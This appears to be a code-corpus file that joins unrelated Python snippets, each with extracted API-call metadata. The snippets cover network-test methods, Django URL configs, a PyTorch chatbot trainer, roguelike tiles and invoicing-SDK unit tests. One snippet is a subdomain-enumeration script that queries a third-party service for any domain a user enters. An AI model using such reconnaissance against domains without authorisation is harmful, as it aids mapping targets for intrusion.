def StopHello(self, *args, **kwargs):
"""Executes the stopHello operation on the server.
Stop sending OSPFv3 Hellos
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stopHello(SessionIndices=list)
------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
stopHello(SessionIndices=string)
--------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stopHello', payload=payload, response_object=None)
def Stophello(self, *args, **kwargs):
"""Executes the stophello operation on the server.
Stops the protocol state machine for the given protocol session instances.
stophello(Arg2=list)list
------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stophello', payload=payload, response_object=None)
| [
"uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo",
"uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector"
] | [((3810, 3825), 'uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector', 'Connector', (['self'], {}), '(self)\n', (3819, 3825), False, 'from uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector\n'), ((4368, 4385), 'uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo', 'LearnedInfo', (['self'], {}), '(self)\n', (4379, 4385), False, 'from uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100 import LearnedInfo\n')] |
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('accounts/', include('django.contrib.auth.urls')),
path('', include('home.urls')),
path('admin/', admin.site.urls),
path('registration/medic', include('medic.urls')),
path('registration/patient', include('patient.urls')),
path('help-request/', include('helprequest.urls')),
]
| [
"django.urls.path",
"django.urls.include"
] | [((188, 219), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (192, 219), False, 'from django.urls import path, include\n'), ((110, 145), 'django.urls.include', 'include', (['"""django.contrib.auth.urls"""'], {}), "('django.contrib.auth.urls')\n", (117, 145), False, 'from django.urls import path, include\n'), ((161, 181), 'django.urls.include', 'include', (['"""home.urls"""'], {}), "('home.urls')\n", (168, 181), False, 'from django.urls import path, include\n'), ((252, 273), 'django.urls.include', 'include', (['"""medic.urls"""'], {}), "('medic.urls')\n", (259, 273), False, 'from django.urls import path, include\n'), ((309, 332), 'django.urls.include', 'include', (['"""patient.urls"""'], {}), "('patient.urls')\n", (316, 332), False, 'from django.urls import path, include\n'), ((361, 388), 'django.urls.include', 'include', (['"""helprequest.urls"""'], {}), "('helprequest.urls')\n", (368, 388), False, 'from django.urls import path, include\n')] |
import requests
import re
url=input("Enter Url [ex: example.com]: ")
def getSubDomain(url):
url=url.replace("www.","").replace("https://","").replace("http://","")
pattern = "[\w]{1,256}\.[a-zA-Z0-9()]{1,6}"
_l = re.compile(pattern)
if _l.match(url):
response = requests.get(f"https://sonar.omnisint.io/subdomains/{url}").text
urls = response.split("\n")
for u in set(urls):
if u=="" or len(u)<=3:
pass
print("[+] ",u.replace("\"","").replace("'","").replace(",","").replace(" ",""))
getSubDomain(url) | [
"requests.get",
"re.compile"
] | [((227, 246), 're.compile', 're.compile', (['pattern'], {}), '(pattern)\n', (237, 246), False, 'import re\n'), ((288, 347), 'requests.get', 'requests.get', (['f"""https://sonar.omnisint.io/subdomains/{url}"""'], {}), "(f'https://sonar.omnisint.io/subdomains/{url}')\n", (300, 347), False, 'import requests\n')] |
from django.urls import path
from .views import start_bot, end_bot
urlpatterns = [
path('startbot/', start_bot),
path('endbot/', end_bot),
] | [
"django.urls.path"
] | [((86, 114), 'django.urls.path', 'path', (['"""startbot/"""', 'start_bot'], {}), "('startbot/', start_bot)\n", (90, 114), False, 'from django.urls import path\n'), ((118, 142), 'django.urls.path', 'path', (['"""endbot/"""', 'end_bot'], {}), "('endbot/', end_bot)\n", (122, 142), False, 'from django.urls import path\n')] |
import json
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from model import NeuralNetwork
from nltk_utils import stem, tokenize, bag_of_words
with open('./data/data.json', 'r') as f:
data = json.load(f)
all_words = []
tags = []
xy = []
for intents in data['intents']:
tag = intents['tag']
tags.append(tag)
for pattern in intents['patterns']:
w = tokenize(pattern)
all_words.extend(w)
xy.append((w, tag))
ignore_words = ['?', '!', '.', ',']
all_words = [stem(w) for w in all_words if w not in ignore_words]
all_words = sorted(set(all_words))
tags = sorted(set(tags))
print(tags)
x_train = []
y_train = []
for (pattern_sentence, tag) in xy:
bag = bag_of_words(pattern_sentence, all_words)
x_train.append(bag)
label = tags.index(tag)
y_train.append(label)
x_train = np.array(x_train)
y_train = np.array(y_train)
class ChatDataset(Dataset):
def __init__(self) -> None:
self.n_samples = len(x_train)
self.x_data = x_train
self.y_data = y_train
#dataset[index]
def __getitem__(self, index: int) -> None:
return self.x_data[index], self.y_data[index]
def __len__(self) -> int:
return self.n_samples
# Hyperparams
batch_size = 8
hidden_size = 8
output_size = len(tags)
input_size = len(x_train[0])
learning_rate = 0.001
num_epochs = 1000
dataset = ChatDataset()
train_loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True, num_workers=2)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = NeuralNetwork(input_size, hidden_size, output_size).to(device)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
for epoch in range(num_epochs):
for (words, labels) in train_loader:
words = words.to(device)
labels = labels.to(device)
outputs = model(words)
loss = criterion(outputs, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (epoch+1) % 100 == 0:
print(f'epoch [{epoch+1}/{num_epochs}], loss: {loss.item():.4f}')
print(f'final loss: {loss.item():.4f}')
data = {
"model_state": model.state_dict(),
"input_size": input_size,
"output_size": output_size,
"hidden_size": hidden_size,
"all_words": all_words,
"tags": tags
}
FILE = './data/data.pth'
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
print(x_train) | [
"torch.nn.CrossEntropyLoss",
"numpy.array",
"nltk_utils.bag_of_words",
"nltk_utils.tokenize",
"torch.cuda.is_available",
"torch.save",
"torch.utils.data.DataLoader",
"json.load",
"model.NeuralNetwork",
"nltk_utils.stem"
] | [((896, 913), 'numpy.array', 'np.array', (['x_train'], {}), '(x_train)\n', (904, 913), True, 'import numpy as np\n'), ((924, 941), 'numpy.array', 'np.array', (['y_train'], {}), '(y_train)\n', (932, 941), True, 'import numpy as np\n'), ((1468, 1547), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'dataset', 'batch_size': 'batch_size', 'shuffle': '(True)', 'num_workers': '(2)'}), '(dataset=dataset, batch_size=batch_size, shuffle=True, num_workers=2)\n', (1478, 1547), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((1703, 1724), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1722, 1724), True, 'import torch.nn as nn\n'), ((2456, 2478), 'torch.save', 'torch.save', (['data', 'FILE'], {}), '(data, FILE)\n', (2466, 2478), False, 'import torch\n'), ((255, 267), 'json.load', 'json.load', (['f'], {}), '(f)\n', (264, 267), False, 'import json\n'), ((564, 571), 'nltk_utils.stem', 'stem', (['w'], {}), '(w)\n', (568, 571), False, 'from nltk_utils import stem, tokenize, bag_of_words\n'), ((763, 804), 'nltk_utils.bag_of_words', 'bag_of_words', (['pattern_sentence', 'all_words'], {}), '(pattern_sentence, all_words)\n', (775, 804), False, 'from nltk_utils import stem, tokenize, bag_of_words\n'), ((440, 457), 'nltk_utils.tokenize', 'tokenize', (['pattern'], {}), '(pattern)\n', (448, 457), False, 'from nltk_utils import stem, tokenize, bag_of_words\n'), ((1581, 1606), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1604, 1606), False, 'import torch\n'), ((1627, 1678), 'model.NeuralNetwork', 'NeuralNetwork', (['input_size', 'hidden_size', 'output_size'], {}), '(input_size, hidden_size, output_size)\n', (1640, 1678), False, 'from model import NeuralNetwork\n')] |
def voto(num):
from datetime import date
anoatual = date.today().year
idade = anoatual - num
if idade < 16:
return f"Com {idade} anos: NÃO VOTA"
elif 16 <= idade < 18 or idade > 65:
return f'Com {idade} anos: VOTO OPCIONAL'
else:
return f"Com {idade} anos: VOTO OBRIGATORIO"
print('-' * 30)
anonasc = int(input('Em que ano você nasceu? '))
print(voto(anonasc))
| [
"datetime.date.today"
] | [((60, 72), 'datetime.date.today', 'date.today', ([], {}), '()\n', (70, 72), False, 'from datetime import date\n')] |
import random
import libtcodpy as libtcod
GRAY_PALETTE = [
# libtcod.Color(242, 242, 242),
libtcod.Color(204, 204, 204),
libtcod.Color(165, 165, 165),
libtcod.Color(127, 127, 127),
libtcod.Color(89, 89, 89),
]
class Tile:
"""
A tile on a map. It may or may not be blocked, and may or may not block
sight.
"""
def __init__(self, blocked, block_sight=None):
self._blocked = blocked
# By default, if a tile is blocked, it also blocks sight
if block_sight is None:
block_sight = blocked
self._block_sight = block_sight
self._fg_symbol = ' '
self.explored = False
@property
def fg_symbol(self):
return self._fg_symbol
@property
def blocked(self):
return self._blocked
@property
def block_sight(self):
return self._block_sight
def render_at(self, con, x, y, visible):
"""
Render a tile at position x, y
"""
# Set color for background
if type(self) == Tile:
return
libtcod.console_set_char_background(
con, x, y, self.bg_color, libtcod.BKGND_SET)
if self.fg_symbol is not None:
# Draw symbol on foreground
libtcod.console_put_char(
con, x, y, self.fg_symbol, libtcod.BKGND_NONE)
# Set color for foreground symbol
libtcod.console_set_char_foreground(con, x, y, self.fg_color)
class Floor(Tile):
"""
A block representing traversable terrain
"""
def __init__(self, bg_color=libtcod.Color(20, 20, 20), fg_symbol=250,
alternate_fg_symbols=['[', ']', '{', '}', '*', '%'],
alternate_symbol_chance=0.1,
# fg_color=libtcod.Color(70, 70, 70)):
fg_color=libtcod.Color(65, 65, 65)):
# Declare it as non-blocking
super().__init__(False)
# self.bg_color = libtcod.black
# self.bg_color = libtcod.Color(10, 10, 10)
# self.bg_color = libtcod.Color(32, 32, 32)
# self.bg_color = libtcod.Color(16, 16, 16)
self.bg_color = bg_color
self.fg_color = fg_color
# Choose one of the available symbols every once in a while
if random.random() < alternate_symbol_chance:
# The alternate symbol
self._fg_symbol = random.choice(alternate_fg_symbols)
else:
# The default symbol
self._fg_symbol = fg_symbol
class Door(Tile):
"""
A door
"""
def __init__(self, bg_color=libtcod.Color(139,69,19),
fg_color=libtcod.orange, is_open=False):
# Declare it as blocked
super().__init__(False)
self.bg_color = bg_color
self.fg_color = fg_color
self.is_open = is_open
def open(self):
self.is_open = True
def close(self):
self.is_open = False
@property
def fg_symbol(self):
"""
Return a different symbol based on status
"""
if self.is_open:
return '-'
else:
return '+'
@property
def block_sight(self):
return not self.is_open
class Wall(Tile):
"""
A block of wall
"""
def __init__(self, bg_color, fg_symbol='#', fg_color=libtcod.black):
# Declare it as blocked
super().__init__(True)
self.bg_color = bg_color
self.fg_color = fg_color
self._fg_symbol = fg_symbol
def create_from_palette(palette=GRAY_PALETTE):
"""
palette: list
Each element is a libtcod.Color object
"""
return Wall(random.choice(palette))
# def create(base_color=libtcod.Color(159, 89, 66), color_variance=20):
# # Extract colors
# b, g, r = base_color.b, base_color.g, base_color.r
# # Slightly alter them
# b += random.randint(-color_variance, color_variance)
# b = max(0, b)
# b = min(255, b)
# g += random.randint(-color_variance, color_variance)
# g = max(0, g)
# g = min(255, g)
# r += random.randint(-color_variance, color_variance)
# r = max(0, r)
# r = min(255, r)
# return Wall(libtcod.Color(b, g, r))
| [
"libtcodpy.console_set_char_background",
"libtcodpy.console_put_char",
"random.choice",
"libtcodpy.console_set_char_foreground",
"random.random",
"libtcodpy.Color"
] | [((101, 129), 'libtcodpy.Color', 'libtcod.Color', (['(204)', '(204)', '(204)'], {}), '(204, 204, 204)\n', (114, 129), True, 'import libtcodpy as libtcod\n'), ((135, 163), 'libtcodpy.Color', 'libtcod.Color', (['(165)', '(165)', '(165)'], {}), '(165, 165, 165)\n', (148, 163), True, 'import libtcodpy as libtcod\n'), ((169, 197), 'libtcodpy.Color', 'libtcod.Color', (['(127)', '(127)', '(127)'], {}), '(127, 127, 127)\n', (182, 197), True, 'import libtcodpy as libtcod\n'), ((203, 228), 'libtcodpy.Color', 'libtcod.Color', (['(89)', '(89)', '(89)'], {}), '(89, 89, 89)\n', (216, 228), True, 'import libtcodpy as libtcod\n'), ((1085, 1170), 'libtcodpy.console_set_char_background', 'libtcod.console_set_char_background', (['con', 'x', 'y', 'self.bg_color', 'libtcod.BKGND_SET'], {}), '(con, x, y, self.bg_color, libtcod.BKGND_SET\n )\n', (1120, 1170), True, 'import libtcodpy as libtcod\n'), ((1597, 1622), 'libtcodpy.Color', 'libtcod.Color', (['(20)', '(20)', '(20)'], {}), '(20, 20, 20)\n', (1610, 1622), True, 'import libtcodpy as libtcod\n'), ((1837, 1862), 'libtcodpy.Color', 'libtcod.Color', (['(65)', '(65)', '(65)'], {}), '(65, 65, 65)\n', (1850, 1862), True, 'import libtcodpy as libtcod\n'), ((2589, 2615), 'libtcodpy.Color', 'libtcod.Color', (['(139)', '(69)', '(19)'], {}), '(139, 69, 19)\n', (2602, 2615), True, 'import libtcodpy as libtcod\n'), ((1272, 1343), 'libtcodpy.console_put_char', 'libtcod.console_put_char', (['con', 'x', 'y', 'self.fg_symbol', 'libtcod.BKGND_NONE'], {}), '(con, x, y, self.fg_symbol, libtcod.BKGND_NONE)\n', (1296, 1343), True, 'import libtcodpy as libtcod\n'), ((1420, 1481), 'libtcodpy.console_set_char_foreground', 'libtcod.console_set_char_foreground', (['con', 'x', 'y', 'self.fg_color'], {}), '(con, x, y, self.fg_color)\n', (1455, 1481), True, 'import libtcodpy as libtcod\n'), ((2278, 2293), 'random.random', 'random.random', ([], {}), '()\n', (2291, 2293), False, 'import random\n'), ((2386, 2421), 'random.choice', 'random.choice', (['alternate_fg_symbols'], {}), '(alternate_fg_symbols)\n', (2399, 2421), False, 'import random\n'), ((3678, 3700), 'random.choice', 'random.choice', (['palette'], {}), '(palette)\n', (3691, 3700), False, 'import random\n')] |
"""
Fatture in Cloud API v2 - API Reference
Connect your software with Fatture in Cloud, the invoicing platform chosen by more than 400.000 businesses in Italy. The Fatture in Cloud API is based on REST, and makes possible to interact with the user related data prior authorization via OAuth2 protocol. # noqa: E501
The version of the OpenAPI document: 2.0.9
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import unittest
import fattureincloud_python_sdk
from fattureincloud_python_sdk.rest import RESTResponse
import functions
from fattureincloud_python_sdk.api.info_api import InfoApi
from fattureincloud_python_sdk.model.city import City
from fattureincloud_python_sdk.model.currency import Currency
from fattureincloud_python_sdk.model.document_template import DocumentTemplate
from fattureincloud_python_sdk.model.language import Language
from fattureincloud_python_sdk.model.list_archive_categories_response import ListArchiveCategoriesResponse
from fattureincloud_python_sdk.model.list_cities_response import ListCitiesResponse
from fattureincloud_python_sdk.model.detailed_country import DetailedCountry
from fattureincloud_python_sdk.model.list_detailed_countries_response import ListDetailedCountriesResponse
from fattureincloud_python_sdk.model.list_cost_centers_response import ListCostCentersResponse
from fattureincloud_python_sdk.model.list_countries_response import ListCountriesResponse
from fattureincloud_python_sdk.model.list_currencies_response import ListCurrenciesResponse
from fattureincloud_python_sdk.model.list_delivery_notes_default_causals_response import ListDeliveryNotesDefaultCausalsResponse
from fattureincloud_python_sdk.model.list_languages_response import ListLanguagesResponse
from fattureincloud_python_sdk.model.list_payment_accounts_response import ListPaymentAccountsResponse
from fattureincloud_python_sdk.model.list_payment_methods_response import ListPaymentMethodsResponse
from fattureincloud_python_sdk.model.list_product_categories_response import ListProductCategoriesResponse
from fattureincloud_python_sdk.model.list_received_document_categories_response import ListReceivedDocumentCategoriesResponse
from fattureincloud_python_sdk.model.list_revenue_centers_response import ListRevenueCentersResponse
from fattureincloud_python_sdk.model.list_templates_response import ListTemplatesResponse
from fattureincloud_python_sdk.model.list_units_of_measure_response import ListUnitsOfMeasureResponse
from fattureincloud_python_sdk.model.list_vat_types_response import ListVatTypesResponse
from fattureincloud_python_sdk.model.payment_account import PaymentAccount
from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType
from fattureincloud_python_sdk.model.payment_method import PaymentMethod
from fattureincloud_python_sdk.model.payment_method_details import PaymentMethodDetails
from fattureincloud_python_sdk.model.payment_method_type import PaymentMethodType
from fattureincloud_python_sdk.model.vat_type import VatType
class TestInfoApi(unittest.TestCase):
"""InfoApi unit test stubs"""
def setUp(self):
self.api = InfoApi()
def tearDown(self):
pass
def test_list_archive_categories(self):
resp = {
'status': 200,
'data': b'{"data":["cat5", "cat6"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListArchiveCategoriesResponse(data = ["cat7", "cat6"])
actual = self.api.list_archive_categories(2)
actual.data[0] = "cat7"
assert actual == expected
def test_list_cities(self):
resp = {
'status': 200,
'data': b'{"data": [{"city": "bergamo", "province": "BG", "postal_code": "24121"}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListCitiesResponse(data = [City( postal_code="24121", city="BG", province="BG" )])
actual = self.api.list_cities()
actual.data[0].city = "BG"
assert actual == expected
def test_list_cost_centers(self):
resp = {
'status': 200,
'data': b'{"data":["bg", "mi"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListCostCentersResponse(data = ["to", "mi"])
actual = self.api.list_cost_centers(2)
actual.data[0] = "to"
assert actual == expected
def test_list_countries(self):
resp = {
'status': 200,
'data': b'{"data":["Spagna", "Italia"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListCountriesResponse(data = ["Spagna", "Albania"])
actual = self.api.list_countries()
actual.data[1] = "Albania"
assert actual == expected
def test_list_detailed_countries(self):
resp = {
'status': 200,
'data': b'{"data": [{"name": "Italia", "settings_name": "Italia", "iso": "IT", "fiscal_iso": "IT", "uic": "086"}, {"name": "Albania", "settings_name": "Albania", "iso": "AL", "fiscal_iso": "AL", "uic": "087"}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListDetailedCountriesResponse( data=[ DetailedCountry( name="Italia", settings_name="Italia", iso="IT", fiscal_iso="IT", uic="086" ), DetailedCountry( name="Albania", settings_name="Albania", iso="AL", fiscal_iso="AL", uic="087" ) ] )
actual = self.api.list_detailed_countries()
actual.data[1].name = "Albania"
assert actual == expected
def test_list_currencies(self):
resp = {
'status': 200,
'data': b'{"data": [{"id": "EUR", "symbol": "e", "exchange_rate": "1"}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListCurrenciesResponse(data = [Currency( id="USD", symbol="e", exchange_rate="1")])
actual = self.api.list_currencies()
actual.data[0].id = "USD"
assert actual == expected
def test_list_delivery_notes_default_causals(self):
resp = {
'status': 200,
'data': b'{"data":["causal1", "causal2"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListDeliveryNotesDefaultCausalsResponse(data = ["causal3", "causal2"])
actual = self.api.list_delivery_notes_default_causals()
actual.data[0] = "causal3"
assert actual == expected
def test_list_languages(self):
resp = {
'status': 200,
'data': b'{"data":[{"code":"ITA","name":"Italiano"}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListLanguagesResponse(data = [Language( code="ITA", name="Italiano" )])
actual = self.api.list_languages()
assert actual == expected
def test_list_payment_accounts(self):
resp = {
'status': 200,
'data': b'{"data": [{"id": 1, "name": "<NAME>", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListPaymentAccountsResponse(data = [PaymentAccount( id=2, name="<NAME>", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True )])
actual = self.api.list_payment_accounts(2)
actual.data[0].id = 2
assert actual == expected
def test_list_payment_methods(self):
resp = {
'status': 200,
'data': b'{"data": [{"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "<NAME>", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListPaymentMethodsResponse(data = [PaymentMethod( id=2, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="<NAME>", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example" )])
actual = self.api.list_payment_methods(2)
actual.data[0].id = 2
assert actual == expected
def test_list_product_categories(self):
resp = {
'status': 200,
'data': b'{"data":["cat5", "cat6"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListProductCategoriesResponse(data = ["cat7", "cat6"])
actual = self.api.list_product_categories(2, "products")
actual.data[0] = "cat7"
assert actual == expected
def test_list_received_document_categories(self):
resp = {
'status': 200,
'data': b'{"data":["cat5", "cat6"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListReceivedDocumentCategoriesResponse(data = ["cat7", "cat6"])
actual = self.api.list_received_document_categories(2)
actual.data[0] = "cat7"
assert actual == expected
def test_list_revenue_centers(self):
resp = {
'status': 200,
'data': b'{"data":["bg", "mi"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListRevenueCentersResponse(data = ["to", "mi"])
actual = self.api.list_revenue_centers(2)
actual.data[0] = "to"
assert actual == expected
def test_list_templates(self):
resp = {
'status': 200,
'data': b'{"data":[{"id":2,"name":"Light Smoke","type":"type_example"}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListTemplatesResponse(data = [DocumentTemplate( id=2, name="Light Smoke", type="type_example" )])
actual = self.api.list_templates()
assert actual == expected
def test_list_units_of_measure(self):
resp = {
'status': 200,
'data': b'{"data":["kg", "km"]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListUnitsOfMeasureResponse(data = ["kb", "km"])
actual = self.api.list_units_of_measure()
actual.data[0] = "kb"
assert actual == expected
def test_list_vat_types(self):
resp = {
'status': 200,
'data': b'{"data": [{"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}]}',
'reason': "OK"
}
mock_resp = RESTResponse(functions.Dict2Class(resp))
mock_resp.getheader = unittest.mock.MagicMock(return_value = None)
mock_resp.getheaders = unittest.mock.MagicMock(return_value = None)
self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp)
expected = ListVatTypesResponse(data = [VatType( id=2, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True )])
actual = self.api.list_vat_types(2)
actual.data[0].id = 2
assert actual == expected
if __name__ == '__main__':
unittest.main()
| [
"fattureincloud_python_sdk.model.vat_type.VatType",
"fattureincloud_python_sdk.model.list_units_of_measure_response.ListUnitsOfMeasureResponse",
"unittest.main",
"fattureincloud_python_sdk.model.list_countries_response.ListCountriesResponse",
"fattureincloud_python_sdk.model.list_product_categories_response... | [((16192, 16207), 'unittest.main', 'unittest.main', ([], {}), '()\n', (16205, 16207), False, 'import unittest\n'), ((3160, 3169), 'fattureincloud_python_sdk.api.info_api.InfoApi', 'InfoApi', ([], {}), '()\n', (3167, 3169), False, 'from fattureincloud_python_sdk.api.info_api import InfoApi\n'), ((3476, 3518), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (3499, 3518), False, 'import unittest\n'), ((3552, 3594), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (3575, 3594), False, 'import unittest\n'), ((3644, 3691), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (3667, 3691), False, 'import unittest\n'), ((3713, 3765), 'fattureincloud_python_sdk.model.list_archive_categories_response.ListArchiveCategoriesResponse', 'ListArchiveCategoriesResponse', ([], {'data': "['cat7', 'cat6']"}), "(data=['cat7', 'cat6'])\n", (3742, 3765), False, 'from fattureincloud_python_sdk.model.list_archive_categories_response import ListArchiveCategoriesResponse\n'), ((4191, 4233), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4214, 4233), False, 'import unittest\n'), ((4267, 4309), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4290, 4309), False, 'import unittest\n'), ((4359, 4406), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (4382, 4406), False, 'import unittest\n'), ((4878, 4920), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4901, 4920), False, 'import unittest\n'), ((4954, 4996), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4977, 4996), False, 'import unittest\n'), ((5046, 5093), 